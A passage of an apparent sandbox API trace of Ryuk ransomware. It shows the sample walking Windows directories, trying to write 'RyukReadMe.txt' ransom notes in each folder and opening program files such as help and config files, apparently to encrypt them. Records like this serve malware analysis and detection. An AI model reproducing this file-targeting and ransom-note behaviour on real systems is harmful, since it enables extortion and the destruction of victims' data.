(lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.996] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0160.996] SetLastError (dwErrCode=0x0) [0160.996] CreateFileW (lpFileName="C:\\RyukReadMe.txt" (normalized: "c:\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.996] GetLastError () returned 0x5 [0160.996] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0160.996] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.996] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*.*", lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 0xffffffffffffffff [0160.996] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0160.996] SetLastError (dwErrCode=0x0) [0160.996] CreateFileW (lpFileName="C:\\MSOCache\\RyukReadMe.txt" (normalized: "c:\\msocache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.996] GetLastError () returned 0x5 [0160.996] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0160.996] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.996] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0160.996] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.996] SetFileAttributesW (lpFileName="C:\\pagefile.sys", dwFileAttributes=0x80) returned 0 [0160.997] CreateFileW (lpFileName="C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.997] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.997] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.997] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0160.997] SetLastError (dwErrCode=0x0) [0160.997] CreateFileW (lpFileName="C:\\RyukReadMe.txt" (normalized: "c:\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.997] GetLastError () returned 0x5 [0160.997] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0160.997] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.997] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*.*", lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 0xffffffffffffffff [0160.997] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0160.997] SetLastError (dwErrCode=0x0) [0160.997] CreateFileW (lpFileName="C:\\PerfLogs\\RyukReadMe.txt" (normalized: "c:\\perflogs\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.997] GetLastError () returned 0x5 [0160.997] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0160.997] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.997] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae950 | out: lpFindFileData=0x29ae950) returned 1 [0160.997] SetLastError (dwErrCode=0x0) [0160.997] CreateFileW (lpFileName="C:\\RyukReadMe.txt" (normalized: "c:\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.997] GetLastError () returned 0x5 [0160.998] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae900, lpOverlapped=0x0) returned 0 [0160.998] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.998] FindFirstFileW (in: lpFileName="C:\\Program Files\\*.*", lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 0x3a2d60 [0160.998] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.998] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0160.998] SetLastError (dwErrCode=0x0) [0160.998] CreateFileW (lpFileName="C:\\Program Files\\RyukReadMe.txt" (normalized: "c:\\program files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.998] GetLastError () returned 0x5 [0160.998] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0160.998] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.998] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2dc0 [0160.998] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.998] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.998] SetLastError (dwErrCode=0x0) [0160.998] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.998] GetLastError () returned 0x5 [0160.998] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0160.998] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.998] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2e20 [0160.999] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.999] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.999] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0160.999] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0160.999] SetLastError (dwErrCode=0x0) [0160.999] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\designer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.999] GetLastError () returned 0x5 [0160.999] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0160.999] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.999] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.999] SetLastError (dwErrCode=0x0) [0160.999] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.999] GetLastError () returned 0x5 [0160.999] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0160.999] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.999] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2e20 [0160.999] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.999] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.999] SetLastError (dwErrCode=0x0) [0161.000] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.000] GetLastError () returned 0x5 [0161.000] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0161.000] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.000] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e80 [0161.000] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.000] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.000] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.000] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.000] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0161.000] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0161.000] SetLastError (dwErrCode=0x0) [0161.000] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.000] GetLastError () returned 0x5 [0161.000] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0161.000] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.000] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0161.000] SetLastError (dwErrCode=0x0) [0161.000] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.000] GetLastError () returned 0x5 [0161.001] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0161.001] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.001] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e80 [0161.001] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.001] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.001] SetLastError (dwErrCode=0x0) [0161.001] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.001] GetLastError () returned 0x5 [0161.001] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.001] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.001] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2ee0 [0161.001] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.001] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0161.001] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0161.001] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0161.001] SetLastError (dwErrCode=0x0) [0161.001] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.001] GetLastError () returned 0x5 [0161.001] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0161.002] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.002] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.002] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.002] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT", dwFileAttributes=0x80) returned 0 [0161.002] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.002] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.002] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.002] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.002] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.002] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.002] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.002] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP", dwFileAttributes=0x80) returned 0 [0161.003] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.003] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.003] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.003] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.003] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.003] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF", dwFileAttributes=0x80) returned 0 [0161.003] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\MTEXTRA.TTF" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\mtextra.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.003] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.003] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.003] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0161.003] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0161.003] SetLastError (dwErrCode=0x0) [0161.004] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.004] GetLastError () returned 0x5 [0161.004] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0161.004] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.004] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0161.004] SetLastError (dwErrCode=0x0) [0161.004] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.004] GetLastError () returned 0x5 [0161.004] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0161.004] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.004] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e80 [0161.004] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.004] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.004] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0161.004] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0161.004] SetLastError (dwErrCode=0x0) [0161.004] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EURO\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\euro\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.004] GetLastError () returned 0x5 [0161.004] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0161.005] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.005] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0161.005] SetLastError (dwErrCode=0x0) [0161.005] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.005] GetLastError () returned 0x5 [0161.005] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0161.005] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.005] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e80 [0161.005] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.005] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.005] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.005] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.005] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.005] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0161.005] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0161.005] SetLastError (dwErrCode=0x0) [0161.005] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.005] GetLastError () returned 0x5 [0161.005] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0161.005] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.005] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0161.005] SetLastError (dwErrCode=0x0) [0161.006] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.006] GetLastError () returned 0x5 [0161.006] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0161.006] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.006] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e80 [0161.006] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.006] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.006] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.010] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG", dwFileAttributes=0x80) returned 0 [0161.011] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0161.011] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0161.011] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0161.011] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0161.011] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0161.011] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.FLT", dwFileAttributes=0x80) returned 0 [0161.011] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft 